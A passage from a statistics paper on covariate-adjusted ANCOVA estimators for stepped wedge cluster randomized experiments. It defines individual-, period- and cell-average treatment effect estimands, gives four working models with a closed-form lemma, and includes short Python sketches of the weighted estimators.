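    I, J = len(Y1), len(Y1[0])
    tau_j, w_j = np.zeros(J), np.zeros(J)
    for j in range(J):
        num = den = 0.0
        for i in range(I):
            w_ij = np.sum(w[i][j])                     # cluster-period total weight w_ij
            ybar1 = np.sum(w[i][j] * Y1[i][j]) / w_ij  # weighted cluster-period means
            ybar0 = np.sum(w[i][j] * Y0[i][j]) / w_ij
            num += w_ij * (ybar1 - ybar0)
            den += w_ij
        tau_j[j], w_j[j] = num / den, den              # tau_j^w and period total weight w_j
    tau_w = float(np.sum(w_j * tau_j) / np.sum(w_j))   # weighted average over rollout periods
    return tau_j, tau_w
```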
Despite the generality of (1), we focus on three specific members under different choices of the weights corresponding to interpretable estimands for stepped wedge cluster randomized experiments. Firstly, the uniform weight is given by \(w_{ijk}=1\) that weighs each individually equally. For this specification, the cluster-period total weight \(w_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}=N_{ij}\), the period total weight \(w_{j}=\sum_{i=1}^{I}w_{ij}=N_{j}\), \(\overline{Y}_{ij}(z)=\sum_{k=1}^{N_{ij}}Y_{ijk}(z)/N_{ij}\) and \(\overline{Y}_{ij}=\sum_{k=1}^{N_{ij}}Y_{ijk}/N_{ij}\) become the simple average of the potential and observed outcomes in each cluster-period. The estimand in period \(j\) is \[\tau_{j}^{w}=\frac{\sum_{i=1}^{I}\left\{N_{ij}\overline{Y}_{ij}(1)-N_{ij} \overline{Y}_{ij}(0)\right\}}{N_{j}}=\frac{\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}} \left\{Y_{ijk}(1)-Y_{ijk}(0)\right\}}{N_{j}}, \tag{2}\] which represents the individual-average treatment effect as defined in parallel-arm cluster randomized experiment (Kahan et al., 2022) as it is the average of individual-level counterfactual contrasts, across all patients from all clusters in period \(j\). The final estimand over the rollout population under the uniform weight is \[\tau^{ind}=\frac{\sum_{j=1}^{J}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}} \left\{Y_{ijk}(1)-Y_{ijk}(0)\right\}}{\sum_{j=1}^{J}N_{j}}=\overline{Y}^{ind} (1)-\overline{Y}^{ind}(0),\] which is the average of all individual-level counterfactual contrasts, across all patients in clusters and all rollout periods. Secondly, we consider the inverse period size weight, where \(w_{ijk}=N_{j}^{-1}\). This specification is akin to the scaled cluster total representation in Su and Ding (2021) when analyzing parallel-arm cluster randomized experiments. In this case, \(w_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}=N_{j}^{-1}N_{ij}\) and \(w_{j}=\sum_{i=1}^{I}w_{ij}=1\). The estimand in period \(j\) is therefore equal to (2). Since the period-specific total weight is 1, the final estimand over the rollout population is given as \[\tau^{period}=\frac{\sum_{j=1}^{J}\left\{N_{j}^{-1}\sum_{i=1}^{I} \sum_{k=1}^{N_{ij}}\left\{Y_{ijk}(1)-Y_{ijk}(0)\right\}\right\}}{J}=\overline{ Y}^{period}(1)-\overline{Y}^{period}(0),\] which is interpreted as the simple average of period-specific mean counterfactual contrasts over all rollout periods, and referred to as the period-average treatment effect. Finally, we consider the inverse cluster-period size weight, where \(w_{ijk}=N_{ij}^{-1}\). For this specification, we have \(w_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}=1\), \(w_{j}=\sum_{i=1}^{I}w_{ij}=I\), \(\overline{Y}_{ij}(z)=\sum_{k=1}^{N_{ij}}Y_{ijk}(z)/N_{ij}\) as the simple average of the potential outcomes in each cluster-period, leading to a period-specific estimand defined as \(\tau_{j}^{w}=I^{-1}\sum_{i=1}^{I}\left\{\overline{Y}_{ij}(1)-\overline{Y}_{ ij}(0)\right\}\), which can be considered as the cluster-average treatment effect, or unit-average treatment effect defined for parallel-arm cluster randomized experiments (Su and Ding, 2021; Wang et al., 2022). The final causal estimand average across all rollout periods is therefore given by \[\tau^{cell}=\frac{\sum_{j=1}^{J}\sum_{i=1}^{I}\left\{\overline{Y}_{ij}(1)- \overline{Y}_{ij}(0)\right\}}{IJ}=\overline{Y}^{cell}(1)-\overline{Y}^{cell} (0),\] which is the average of all cluster-period-specific or cell-specific mean counterfactual contrasts. 
We refer to this estimand as the cell-average treatment effect, where each cell represents a unique cluster-period during the rollout. Table 1 provides a quick summary of the weight specifications and interpretations of these three estimands, which explicate whether the treatment effect estimates target the expected value of outcomes when applied to the population of all individuals, population of cluster-period cells, or populations of individuals in an average period. In general settings where the cluster sizes are variable, these three estimands are not necessarily equal, especially when there is an association between the cluster-period size \(N_{ij}\) and the within-cluster counterfactual contrasts; this has been referred to as the informative cluster size (Kahan et al., 2022). However, when the cluster-period sizes \(N_{ij}\)'s are homogeneous or the treatment effect is constant across cluster-period cells, the three estimands will coincide. In the more general settings where the three estimands can take different values, they may be interpreted differently and the choice of estimands will depend on the study context, the nature of the intervention and the study objectives. In general, the individual-average treatment effect answers the question "_how effective is the intervention for an average individual during the entire rollout?_", the period-average treatment effect answers the question "_how effective is the intervention for an average individual during an average period?_", whereas the cell-average treatment effect answers the question "_how effective is the intervention for an average cluster-period cell?_" Answers to these three questions pertain to different aspects of the intervention effect and may lead to different policy implications. The differentiation of estimands in stepped wedge cluster randomized experiments in this work can be seen as the counterparts of those developed for parallel-arm cluster randomized experiments; see, for example, Kahan et al. (2022). ## 3 Analysis of covariance point and variance estimators ### ANCOVA Model Formulation To estimate the class of estimands (1) and specific members in Table 1, we first consider the following working ANCOVA model that allows for baseline covariate adjustment: \[Y_{ijk}=\beta_{j}+\tau_{j}Z_{ij}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}+e_{ijk}, \tag{3}\] where \(\beta_{j}\) is the period fixed effect or referred to as the secular trend parameter in the stepped wedge design literature, \(\tau_{j}\) is the period-specific average treatment effect parameter, \(\widetilde{\mathbf{X}}_{ijk}=\mathbf{X}_{ijk}-\overline{\mathbf{X}}_{j}\) is the \(p\)-dimensional period-mean centered baseline covariate row vector with \(\overline{\mathbf{X}}_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}\mathbf{X}_{ijk}/\sum_{k=1}^{N_{ ij}}w_{ijk}\) and \(\overline{\mathbf{X}}_{j}=\sum_{i=1}^{I}w_{ij}\overline{\mathbf{X}}_{ij}/\sum_{i=1}^{I }w_{ij}\), \(\mathbf{\gamma}\) is the associated parameter vector, and \(e_{ijk}\) is the individual-level random noise. Model (3) has been used in Schochet et al. (2021) to analyze blocked cluster randomized experiments, and shares some connections with the ANCOVA I estimator discussed in Lin (2013) and Tsiatis et al. (2008) applied to individually randomized experiments. Therefore, we call model (3) the ANCOVA I model. 
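To illustrate how the ANCOVA I working model can be fit in practice, the sketch below (illustrative only; the long-format data layout, function name, and use of numpy are our own assumptions and not part of the article) performs the period-mean centering and the weighted least squares fit, returning the period effects \(\beta_{j}\), the period-specific treatment effects \(\tau_{j}\), and the covariate coefficients \(\mathbf{\gamma}\).

```python
import numpy as np

def fit_ancova1(period, Z, X, Y, w):
    """Weighted least squares fit of the ANCOVA I working model (3).

    period : (n,) rollout period labels for each individual
    Z      : (n,) treatment indicators Z_ij copied to individuals
    X      : (n, p) baseline covariates X_ijk
    Y      : (n,) observed outcomes
    w      : (n,) estimand-specific weights w_ijk
    Illustrative sketch; inputs are restricted to the rollout periods.
    """
    period, Z, Y, w = map(np.asarray, (period, Z, Y, w))
    X = np.asarray(X, dtype=float)
    labels = np.unique(period)
    J = len(labels)
    Xc = X.copy()
    for j in labels:                                   # period-mean centering with the same weights
        m = period == j
        Xc[m] -= np.average(X[m], axis=0, weights=w[m])
    P = (period[:, None] == labels[None, :]).astype(float)   # period fixed effects
    D = np.hstack([P, P * Z[:, None], Xc])             # columns: [beta_j | tau_j | gamma]
    sw = np.sqrt(w / w.sum())
    coef, *_ = np.linalg.lstsq(D * sw[:, None], Y * sw, rcond=None)
    return coef[:J], coef[J:2 * J], coef[2 * J:]       # (beta_j, tau_j, gamma)
```

Under this working model, the coefficients on the period-specific treatment indicators serve as the period-specific treatment effect estimates; the other three working models introduced next only change the construction of the design matrix.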
Importantly, ANCOVA I is a working model in the sense that we can interpret \(\tau_{j}\) as a causal effect parameter regardless of whether the linear index, \(\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}\), is compatible with the unknown true data generating process (DGP); for this reason, the resulting estimator for \(\tau_{j}\) is model-assisted rather than model-based. The working ANCOVA I model also covers the unadjusted estimator, in which no covariate adjustments are included, obtained by setting the parameter vector \(\mathbf{\gamma}=\mathbf{0}\). Besides ANCOVA I, we also consider three possible variations of the model formulation, depending on whether treatment-by-covariate or treatment-by-covariate-by-period interactions are considered in the working model. Specifically, the ANCOVA II model includes period-specific main effects of the covariates, and is written as \[Y_{ijk}=\beta_{j}+\tau_{j}Z_{ij}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}_{j}+e_{ijk}. \tag{4}\] \begin{table} \begin{tabular}{c l l} \hline \hline **Estimand** & **Choice of weight** & **Interpretation** \\ \hline \(\tau^{ind}=\overline{Y}^{ind}(1)-\overline{Y}^{ind}(0)\) & \(w_{ijk}=1\) & The average of individual-level counterfactual contrasts, \\ & \(w_{ij}=N_{ij}\) & across all individuals during the rollout. This estimand gives \\ & \(w_{j}=N_{j}\) & equal weight to each individual. \\ \hline \(\tau^{period}=\overline{Y}^{period}(1)-\overline{Y}^{period}(0)\) & \(w_{ijk}=N_{j}^{-1}\) & The average of individual-level counterfactual contrasts per \\ & \(w_{ij}=N_{ij}/N_{j}\) & period, which is further averaged across all rollout periods. \\ & \(w_{j}=1\) & This estimand gives equal weight to each rollout period. \\ \hline \(\tau^{cell}=\overline{Y}^{cell}(1)-\overline{Y}^{cell}(0)\) & \(w_{ijk}=N_{ij}^{-1}\) & The average of cluster-period cell-level mean counterfactual \\ & \(w_{ij}=1\) & contrasts, across all cluster-period cells during the rollout. This \\ & \(w_{j}=I\) & estimand gives equal weight to each cluster-period cell. \\ \hline \hline \end{tabular} \end{table} Table 1: A summary of definitions for three interpretable causal estimands in the general family of estimands (1). In the special case where \(\mathbf{\gamma}_{j}=\mathbf{\gamma}\) for all \(j\), the ANCOVA II model reduces to the ANCOVA I model. In the analyses of individually randomized experiments and parallel-arm cluster randomized experiments, effects of the interactions between the treatment status and the covariate vector are often considered as a strategy to further improve precision under unbalanced randomization (Lin, 2013; Su and Ding, 2021). We thus further include the following ANCOVA III model with treatment-by-covariate interactions: \[Y_{ijk}=\beta_{j}+\tau_{j}Z_{ij}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}+Z_{ij}\widetilde{\mathbf{X}}_{ijk}\mathbf{\eta}+e_{ijk}, \tag{5}\] and the ANCOVA IV model with period-specific treatment-by-covariate interactions: \[Y_{ijk}=\beta_{j}+\tau_{j}Z_{ij}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}_{j}+Z_{ij}\widetilde{\mathbf{X}}_{ijk}\mathbf{\eta}_{j}+e_{ijk}. \tag{6}\] Setting \(\mathbf{\eta}=\mathbf{0}\) and \(\mathbf{\eta}_{j}=\mathbf{0}\) respectively in the ANCOVA III and ANCOVA IV models, we obtain the ANCOVA I and ANCOVA II models as two special cases. For the ANCOVA III and IV models, a reparameterization can be useful in facilitating the derivations of analytical results. 
Specifically, we separate the model components by treatment conditions and obtain: \[Y_{ijk}=(1-Z_{ij})\beta_{j}+(1-Z_{ij})\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}+Z_{ij}\tau_{j}^{*}+Z_{ij}\widetilde{\mathbf{X}}_{ijk}\mathbf{\eta}^{*}+e_{ijk},\] and \[Y_{ijk}=(1-Z_{ij})\beta_{j}+(1-Z_{ij})\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}_{j}+Z_{ij}\tau_{j}^{*}+Z_{ij}\widetilde{\mathbf{X}}_{ijk}\mathbf{\eta}_{j}^{*}+e_{ijk},\] where \(\tau_{j}^{*}=\beta_{j}+\tau_{j}\), \(\mathbf{\eta}^{*}=\mathbf{\gamma}+\mathbf{\eta}\), and \(\mathbf{\eta}_{j}^{*}=\mathbf{\gamma}_{j}+\mathbf{\eta}_{j}\). Our proposed ANCOVA estimators for \(\tau_{j}^{w}\) are obtained via fitting any one of the above four working ANCOVA models using weighted least squares (WLS) with weights \(w_{ijk}\) specified according to the estimand of interest. Table 2 provides a succinct summary of the different model formulations. Before we proceed, we first establish the following lemma, which indicates that the four ANCOVA estimators can be written in similar forms and therefore can be considered as members of a family of estimators. **Lemma 1**.: _Defining \(w_{j}^{1}=\sum_{i=1}^{I}Z_{ij}w_{ij}\) and \(w_{j}^{0}=\sum_{i=1}^{I}(1-Z_{ij})w_{ij}\) as the treatment-specific total weight per period, the WLS estimators for \(\tau_{j}^{w}\), obtained from fitting ANCOVA I-IV, have the following closed-form expression:_ \[\widehat{\tau}_{j}^{w}=\frac{1}{w_{j}^{1}}\sum_{i:Z_{ij}=1}w_{ij}\overline{U}_{ij}(1)-\frac{1}{w_{j}^{0}}\sum_{i:Z_{ij}=0}w_{ij}\overline{U}_{ij}(0)=\overline{u}_{j}(1)-\overline{u}_{j}(0). \tag{7}\] _In particular, further define \(\overline{y}_{j}(z)=\sum_{i:Z_{ij}=z}w_{ij}\overline{Y}_{ij}(z)/w_{j}^{z}\) and \(\widetilde{\mathbf{X}}_{j}^{z}=\sum_{i:Z_{ij}=z}w_{ij}\widetilde{\mathbf{X}}_{ij}/w_{j}^{z}=\sum_{i:Z_{ij}=z}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}/w_{j}^{z}\) for \(z\in\{0,1\}\). Then,_ 1. _for ANCOVA I,_ \(\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}\)_,_ \(\overline{U}_{ij}(z)=\overline{Y}_{ij}(z)-\widetilde{\mathbf{X}}_{ij}\widehat{\mathbf{\gamma}}\)_, and_ \(\overline{u}_{j}(z)=\overline{y}_{j}(z)-\widetilde{\mathbf{X}}_{j}^{z}\widehat{\mathbf{\gamma}}\)_;_ 2. _for ANCOVA II,_ \(\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}\)_,_ \(\overline{U}_{ij}(z)=\overline{Y}_{ij}(z)-\widetilde{\mathbf{X}}_{ij}\widehat{\mathbf{\gamma}}_{j}\)_, and_ \(\overline{u}_{j}(z)=\overline{y}_{j}(z)-\widetilde{\mathbf{X}}_{j}^{z}\widehat{\mathbf{\gamma}}_{j}\)_;_ 3. _for ANCOVA III,_ \(\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{*}-\widehat{\beta}_{j}\)_,_ \(\overline{U}_{ij}(1)=\overline{Y}_{ij}(1)-\widetilde{\mathbf{X}}_{ij}\widehat{\mathbf{\eta}}^{*}\)_,_ \(\overline{U}_{ij}(0)=\overline{Y}_{ij}(0)-\widetilde{\mathbf{X}}_{ij}\widehat{\mathbf{\gamma}}\)_,_ \(\overline{u}_{j}(1)=\overline{y}_{j}(1)-\widetilde{\mathbf{X}}_{j}^{1}\widehat{\mathbf{\eta}}^{*}\)_, and_ \(\overline{u}_{j}(0)=\overline{y}_{j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{\mathbf{\gamma}}\)_;_ 4. 
_for ANCOVA IV,_ \(\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{*}-\widehat{\beta}_{j}\)_,_ \(\overline{U}_{ij}(1)=\overline{Y}_{ij}(1)-\widetilde{\mathbf{X}}_{ij}\widehat{\mathbf{\eta}}_{j}^{*}\)_,_ \(\overline{U}_{ij}(0)=\overline{Y}_{ij}(0)-\widetilde{\mathbf{X}}_{ij}\widehat{\mathbf{\gamma}}_{j}\)_,_ \(\overline{u}_{j}(1)=\overline{y}_{j}(1)-\widetilde{\mathbf{X}}_{j}^{1}\widehat{\mathbf{\eta}}_{j}^{*}\)_, and_ \(\overline{u}_{j}(0)=\overline{y}_{j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{\mathbf{\gamma}}_{j}\)_,_ \begin{table} \begin{tabular}{l c c c} \hline \hline **Estimator** & **Mean model** & \begin{tabular}{c} **Period-specific** \\ **covariate effects** \\ \end{tabular} & \begin{tabular}{c} **Treatment-by-** \\ **covariate interactions** \\ \end{tabular} \\ \hline ANCOVA I & \(\beta_{j}+\tau_{j}Z_{ij}+(\mathbf{X}_{ijk}-\overline{\mathbf{X}}_{j})\mathbf{\gamma}\) & \(\times\) & \(\times\) \\ \hline ANCOVA II & \(\beta_{j}+\tau_{j}Z_{ij}+(\mathbf{X}_{ijk}-\overline{\mathbf{X}}_{j})\mathbf{\gamma}_{j}\) & \(\checkmark\) & \(\times\) \\ \hline ANCOVA III & \(\beta_{j}+\tau_{j}Z_{ij}+(\mathbf{X}_{ijk}-\overline{\mathbf{X}}_{j})\mathbf{\gamma}+Z_{ij}(\mathbf{X}_{ijk}-\overline{\mathbf{X}}_{j})\mathbf{\eta}\) & \(\times\) & \(\checkmark\) \\ \hline ANCOVA IV & \(\beta_{j}+\tau_{j}Z_{ij}+(\mathbf{X}_{ijk}-\overline{\mathbf{X}}_{j})\mathbf{\gamma}_{j}+Z_{ij}(\mathbf{X}_{ijk}-\overline{\mathbf{X}}_{j})\mathbf{\eta}_{j}\) & \(\checkmark\) & \(\checkmark\) \\ \hline \hline \end{tabular} \end{table} Table 2: Four model-assisted analysis of covariance estimators adjusting for baseline covariates in stepped wedge cluster randomized experiments. _where \(\widehat{\tau}_{j}\), \(\widehat{\tau}_{j}^{*}\), \(\widehat{\beta}_{j}\), \(\widehat{\mathbf{\gamma}}\), \(\widehat{\mathbf{\gamma}}_{j}\), \(\widehat{\mathbf{\eta}}^{*}\), and \(\widehat{\mathbf{\eta}}_{j}^{*}\) are the estimated regression coefficients from fitting the respective working models._ Lemma 1 suggests that all four ANCOVA estimators can be written in a similar form, which is the difference between weighted averages of cluster-period residualized potential outcomes. The nonparametric estimator, where no covariate adjustments are considered, is also a special member of (7) with \(\overline{U}_{ij}(z)=\overline{Y}_{ij}(z)\) and \(\overline{u}_{j}(z)=\overline{y}_{j}(z)\). The proof of Lemma 1 is given in Web Appendix A. With Lemma 1, we can show that, under Assumptions 1-3, each ANCOVA estimator of \(\tau^{w}\), defined as a weighted average of \(\widehat{\tau}_{j}^{w}\), \(j=1,\ldots,J\), i.e., \[\widehat{\tau}^{w}=\frac{\sum_{j=1}^{J}w_{j}\widehat{\tau}_{j}^{w}}{\sum_{j=1}^{J}w_{j}}, \tag{8}\] is consistent for the target estimand \(\tau^{w}\) even if the working ANCOVA models are incorrectly specified. ### Theoretical Properties Under the staggered rollout randomization scheme, we formalize the theoretical properties of \(\widehat{\tau}^{w}\) under an asymptotic regime similar to that in Middleton and Aronow (2015), Li and Ding (2017) and Schochet et al. (2021), where an increasing sequence of finite populations is considered with the number of clusters \(I\to\infty\). In our case, the number of rollout periods, \(J\), is assumed to be fixed. Furthermore, we assume that the number of clusters randomized to the treatment condition in period \(j\) increases proportionally, that is, \(I_{j}/I=e_{j}\) as \(I\to\infty\). 
Finally, we assume that the number of individuals in each cluster and the corresponding weight remain relatively balanced for each period (no clusters with a dominating number of individuals or weights in any rollout period), and neither varies as a function of \(I\). The last assumption is to prevent ill-mannered behaviors of the ANCOVA estimators. For stepped wedge designs, an important consideration is that treatment assignments for a cluster, and between any pairs of clusters, across rollout periods are correlated, which is different from a parallel-arm or blocked cluster randomization scheme (where randomization is conducted independently within each block; see, for example, Schochet et al. (2021)). Therefore, to present a finite population Central Limit Theorem (CLT) for \(\widehat{\tau}^{w}\), these aforementioned correlations must be addressed. Similar to Athey and Imbens (2022) and Roth and Sant'Anna (2021), we introduce an alternative perspective of viewing different treatment adoption times as different treatment arms and potential outcomes for a cluster across \(J\) rollout periods as a \(J\)-dimensional potential outcome vector, which leverages the random assignment to multiple arms, each of which is uniquely determined by the treatment adoption time. Specifically, we let \(A_{i}=a\), \(a\in\mathcal{A}=\{1,\ldots,J,J+1\}\), denote the adoption date of the treatment for cluster \(i\), and we have \(G_{ia}=\mathbb{I}\{A_{i}=a\}\), which is equal to one if cluster \(i\) adopts the treatment at period \(a\). Note that cluster \(i\) does not receive treatment throughout the rollout phase if \(A_{i}=J+1\). Under this perspective, the \(J\)-dimensional potential outcome vector of individual \(k\) in cluster \(i\) with adoption date \(a\) is \(\mathbf{Y}_{ik}^{a}=(Y_{i1k}^{a},\ldots,Y_{iJk}^{a})^{\prime}\) and the corresponding weighted average for cluster \(i\) is \(\overline{\mathbf{Y}}_{i}^{a}=(\overline{Y}_{i1}^{a},\ldots,\overline{Y}_{iJ}^{a} )^{\prime}\), where \(\overline{Y}_{ij}^{a}=\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}^{a}/\sum_{k=1}^{N_{ ij}}w_{ijk}\). We can then write the observed potential outcome vector of individual \(k\) in cluster \(i\) as \(\mathbf{Y}_{ik}=\sum_{a\in\mathcal{A}}G_{ia}\mathbf{Y}_{ik}^{a}\), where \(\mathbf{Y}_{ik}=(Y_{i1k},\ldots,Y_{iJk})^{\prime}\) with \(Y_{ijk}=\sum_{a\in\mathcal{A}}G_{ia}Y_{ijk}^{a}\). We further define \(\overline{\mathbf{Y}}^{a}=\left(\overline{Y}_{1}^{a},\ldots,\overline{Y}_{J}^{a} \right)^{\prime}\), where \(\overline{Y}_{j}^{a}=\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}^{a}/\sum_{i=1}^{I} w_{ij}\). 
Then Assumption 2 allows us to re-express components of the weighted average treatment effect of period \(j\) as \[\overline{Y}_{j}(1) =\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}w_{j}\overline{ Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}w_{j}}=\frac{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}\overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a\leq j\}},\] \[\overline{Y}_{j}(0) =\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}w_{j}\overline{Y}_{j }^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}w_{j}}=\frac{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}\overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}}.\] Note that, because of Assumption 2, re-expressions of \(\overline{Y}_{j}(1)\) and \(\overline{Y}_{j}(0)\) in terms of \(\overline{Y}_{j}^{a}\) are not unique, and in fact, one can choose any reasonable weights, i.e., positive and finite, \(\varphi_{a}\), such that \[\overline{Y}_{j}(1)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}\varphi_{a }\overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}\varphi_{a}}, \text{ \ and \ }\overline{Y}_{j}(0)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\varphi_{a} \overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\varphi_{a}}.\] Define \(e_{a}=I_{a}/I\) as the proportion of clusters randomized to treatment adoption time \(a\). Under the same asymptotic regime, we require \(e_{a}>0\) and remains fixed as \(I\to\infty\) for all \(a\). We thus choose \(\varphi_{a}=I_{a}\) which will be useful in further derivations of the CLT results for \(\widehat{\tau}^{w}\). Thus, with the re-expressions above, we can reformulate \(\tau^{w}\) as a linear combination of \(\widetilde{Y}^{a}_{j}\)'s, i.e., \[\tau^{w}=\sum_{j=1}^{J}\sum_{a\in\mathcal{A}}B^{a}_{j}\overline{Y}^{a}_{j}, \tag{9}\] where \[B^{a}_{j}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{I}\{a\leq j\}I _{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}}-\frac{\mathbb{I}\{a>j \}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a}}\right\}.\] Similarly, the estimator, \(\widehat{\tau}^{w}\), can also be re-expressed in terms of random components under the multiple-arm perspective. Analogous to the definition of \(\overline{Y}^{a}_{ij}\) and \(\overline{Y}^{a}_{j}\), we define \(\overline{U}^{a}_{j}=\sum_{i=1}^{I}w_{ij}\overline{U}^{a}_{ij}/\sum_{i=1}^{I }w_{ij}\), where 1. for ANCOVA I, \(\overline{U}^{a}_{ij}=\overline{Y}^{a}_{ij}-\widetilde{\mathbf{X}}_{ij}\widehat {\mathbf{\gamma}}\); 2. for ANCOVA II, \(\overline{U}^{a}_{ij}=\overline{Y}^{a}_{ij}-\widetilde{\mathbf{X}}_{ij}\widehat {\mathbf{\gamma}}_{j}\); 3. for ANCOVA III, \(\overline{U}^{a}_{ij}=\overline{Y}^{a}_{ij}-\widetilde{\mathbf{X}}_{ij}(\mathbb{I }\{a\leq j\}\widehat{\mathbf{\eta}}^{*}+\mathbb{I}\{a>j\}\widehat{\mathbf{\gamma}})\); 4. for ANCOVA IV, \(\overline{U}^{a}_{ij}=\overline{Y}^{a}_{ij}-\widetilde{\mathbf{X}}_{ij}(\mathbb{I }\{a\leq j\}\widehat{\mathbf{\eta}}^{*}_{j}+\mathbb{I}\{a>j\}\widehat{\mathbf{\gamma} }_{j})\). 
Writing \(\overline{u}^{a}_{j}=\sum_{i=1}^{I}w_{ij}G_{ia}\overline{U}^{a}_{ij}/\sum_{i=1}^{I}w_{ij}G_{ia}\), we have the following re-expressions for the random components: \[\overline{u}_{j}(1)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)\overline{u}^{a}_{j}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)},\ \ \overline{u}_{j}(0)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)\overline{u}^{a}_{j}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)}.\] Hence \(\widehat{\tau}^{w}\) can be re-expressed as \[\widehat{\tau}^{w}=\sum_{j=1}^{J}\sum_{a\in\mathcal{A}}b^{a}_{j}\overline{u}^{a}_{j}, \tag{10}\] where \[b^{a}_{j}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{I}\{a\leq j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)}{\sum_{a}\mathbb{I}\{a\leq j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)}-\frac{\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)}{\sum_{a}\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)}\right\}.\] We first define intermediate quantities \(\widetilde{U}^{a}_{ij}\), in which the estimates of the associated parameter vectors, \(\widehat{\mathbf{\gamma}}\), \(\widehat{\mathbf{\gamma}}_{j}\), \(\widehat{\mathbf{\eta}}^{*}\), and \(\widehat{\mathbf{\eta}}^{*}_{j}\), are substituted by their corresponding known values, \(\mathbf{\gamma}\), \(\mathbf{\gamma}_{j}\), \(\mathbf{\eta}^{*}\), and \(\mathbf{\eta}^{*}_{j}\), namely the weighted least squares coefficient vectors that would be obtained if the full set of potential outcomes were available. We then define vectors of period-level random components, \(\overline{\mathbf{t}}^{a}=(w\widetilde{u}^{a}_{1},\ldots,w\widetilde{u}^{a}_{J},\overline{w}^{a}_{1},\ldots,\overline{w}^{a}_{J})^{\prime}\), where \(w\widetilde{u}^{a}_{j}=I_{a}^{-1}\sum_{i=1}^{I}G_{ia}w_{ij}\widetilde{U}^{a}_{ij}\) and \(\overline{w}^{a}_{j}=I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia}\), and vectors of period-level average components, \(\overline{\mathbf{T}}^{a}=(w\widetilde{U}^{a}_{1},\ldots,w\widetilde{U}^{a}_{J},\overline{w}_{1},\ldots,\overline{w}_{J})^{\prime}\), where \(w\widetilde{U}^{a}_{j}=I^{-1}\sum_{i=1}^{I}w_{ij}\widetilde{U}^{a}_{ij}\) and \(\overline{w}_{j}=I^{-1}\sum_{i=1}^{I}w_{ij}\), together with cluster-level vectors, \(\overline{\mathbf{T}}^{a}_{i}=(w_{i1}\widetilde{U}^{a}_{i1},\ldots,w_{iJ}\widetilde{U}^{a}_{iJ},w_{i1},\ldots,w_{iJ})^{\prime}\), such that \(\overline{\mathbf{T}}^{a}=I^{-1}\sum_{i=1}^{I}\overline{\mathbf{T}}^{a}_{i}\). Also, we define covariance matrices, \(\mathbf{S}^{a}_{T}=(I-1)^{-1}\sum_{i=1}^{I}(\overline{\mathbf{T}}^{a}_{i}-\overline{\mathbf{T}}^{a})(\overline{\mathbf{T}}^{a}_{i}-\overline{\mathbf{T}}^{a})^{\prime}\), as well as cross-product matrices, \(\mathbf{S}^{a,a^{\prime}}_{T}=(I-1)^{-1}\sum_{i=1}^{I}(\overline{\mathbf{T}}^{a}_{i}-\overline{\mathbf{T}}^{a})(\overline{\mathbf{T}}^{a^{\prime}}_{i}-\overline{\mathbf{T}}^{a^{\prime}})^{\prime}\). Similar to \(\widetilde{U}^{a}_{ij}\), we define intermediate quantities \(\widetilde{U}_{ij}(z)\) by replacing the estimates of the associated parameter vectors with their corresponding known values. 
